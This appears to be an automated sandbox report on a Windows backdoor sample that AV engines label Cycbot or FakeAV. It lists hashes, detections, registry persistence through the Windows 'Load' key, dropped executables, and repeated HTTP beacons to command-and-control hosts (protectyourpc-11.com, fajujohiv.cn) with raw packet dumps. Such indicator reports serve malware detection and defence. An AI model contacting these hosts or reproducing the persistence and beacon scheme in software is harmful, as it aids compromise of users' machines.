Analysis Date2014-12-03 07:11:17
MD51054faa2b7c387d022a986eab25de9bb
SHA11837e4ca8706ae6d28f4d4ad61899020fa08f43b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: e5639527a151b75ff61957a16e7a3bff sha1: da4cf0b3e2848ea4a2acc33d89bf3f85b7ebccc4 size: 59904
Section.rdata md5: 7e36b9fe976071b59f45e441080369e0 sha1: 947099e68597a62d5716b7c4a6b126d96fe14ff1 size: 5120
Section.data md5: 4457667c27e786be25d60dbc62bee843 sha1: 4dbc10d69ef437fccb5cbc666b29ba319beb118f size: 41472
Section.rsrc md5: f16d3ddf753f2bd79df60d807995e971 sha1: 79d43f37515053254dd2d286fb2b71ceec4668f8 size: 1024
Timestamp2005-09-25 05:52:42
VersionLegalCopyright: Copyright (C) 2010
InternalName: c3
FileVersion: 1, 0, 0, 1
FileDescription: Desktop Window Manager
ProductVersion: 1, 0, 0, 1
PrivateBuild: 1102
OriginalFilename: c3.exe
PEhash9b9ca81ca3394aaab5bc6dfd346f18cb63bc1ab2
IMPhash5cefe899eb9638767aafec9e02fcae7f
AV360 SafeGen:Heur.Conjar.2
AVAd-AwareGen:Heur.Conjar.2
AVAlwil (avast)MalOb-IJ [Cryp]
AVArcabit (arcavir)Packed.Krap.hy
AVAuthentiumW32/Goolbot.A.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Heur.Conjar.2
AVCA (E-Trust Ino)Win32/FakeAV.S!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Agent-185063
AVDr. WebTrojan.MulDrop1.49662
AVEmsisoftGen:Heur.Conjar.2
AVEset (nod32)Win32/Kryptik.HPG
AVFortinetW32/Swisyn.AOE!tr
AVFrisk (f-prot)W32/Goolbot.A.gen!Eldorado
AVF-SecureGen:Heur.Conjar.2
AVGrisoft (avg)Win32/Cryptor
AVIkarusPacked.Win32.Krap
AVK7Backdoor ( 04c51d251 )
AVKasperskyPacked.Win32.Krap.hy
AVMalwareBytesTrojan.Agent.Gen
AVMcafeeBackDoor-EXI
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.2
AVNormanGen:Heur.Conjar.2
AVRisingno_virus
AVSophosTroj/FakeAV-BVU
AVSymantecTrojan.FakeAV!gen39
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSwww.google.com
Winsock DNS127.0.0.1
Winsock DNS8.ctrl.fajujohiv.cn
Winsock DNSfajujohiv.cn
Winsock DNS7.ctrl.fajujohiv.cn

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Network Details:

DNSprotectyourpc-11.com
Type: A
74.200.250.181
DNSwww.google.com
Type: A
173.194.37.52
DNSwww.google.com
Type: A
173.194.37.51
DNSwww.google.com
Type: A
173.194.37.50
DNSwww.google.com
Type: A
173.194.37.49
DNSwww.google.com
Type: A
173.194.37.48
DNSfajujohiv.cn
Type: A
DNS7.ctrl.fajujohiv.cn
Type: A
DNS8.ctrl.fajujohiv.cn
Type: A
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=main&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err088_2_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err073_2_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err083&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err095_0_7&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err088_2_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err073_2_1&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err083&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err095_1_8&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://www.google.com/
User-Agent:
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err094_43_11001&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err093_43_11001&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1032 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1033 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1034 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1035 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1036 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1037 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1038 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1039 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1040 ➝ 173.194.37.52:80
Flows TCP192.168.1.1:1041 ➝ 173.194.37.52:80
Flows TCP192.168.1.1:1042 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1043 ➝ 74.200.250.181:80

Raw Pcap
0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7633 30267379 7374656d   ype=g_v30&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d6d 61696e26 6e3d3026   status=main&n=0&
0x00000070 (00112)   65787472 613d3020 48545450 2f312e31   extra=0 HTTP/1.1
0x00000080 (00128)   0d0a486f 73743a20 70726f74 65637479   ..Host: protecty
0x00000090 (00144)   6f757270 632d3131 2e636f6d 0d0a5573   ourpc-11.com..Us
0x000000a0 (00160)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x000000b0 (00176)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x000000c0 (00192)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x000000d0 (00208)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x000000e0 (00224)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x000000f0 (00240)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000100 (00256)   73650d0a 0d0a                         se....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7633 30267379 7374656d   ype=g_v30&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 385f325f   status=err088_2_
0x00000070 (00112)   30266e3d 30266578 7472613d 30204854   0&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7633 30267379 7374656d   ype=g_v30&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723037 335f325f   status=err073_2_
0x00000070 (00112)   30266e3d 30266578 7472613d 30204854   0&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7633 30267379 7374656d   ype=g_v30&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 33266e3d   status=err083&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a 0d0a0d0a            lose........

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7633 30267379 7374656d   ype=g_v30&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 355f305f   status=err095_0_
0x00000070 (00112)   37266e3d 30266578 7472613d 30204854   7&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7633 30267379 7374656d   ype=g_v30&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 385f325f   status=err088_2_
0x00000070 (00112)   30266e3d 30266578 7472613d 30204854   0&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   a001                                  ..

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7633 30267379 7374656d   ype=g_v30&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723037 335f325f   status=err073_2_
0x00000070 (00112)   31266e3d 30266578 7472613d 30204854   1&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7633 30267379 7374656d   ype=g_v30&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 33266e3d   status=err083&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a 20746869 73207365   lose.... this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7633 30267379 7374656d   ype=g_v30&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 355f315f   status=err095_1_
0x00000070 (00112)   38266e3d 30266578 7472613d 30204854   8&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 69643d41 35393034    */*....id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 33266e3d   status=err083&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a 20746869 73207365   lose.... this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 69643d41 35393034    */*....id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 33266e3d   status=err083&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a 20746869 73207365   lose.... this se
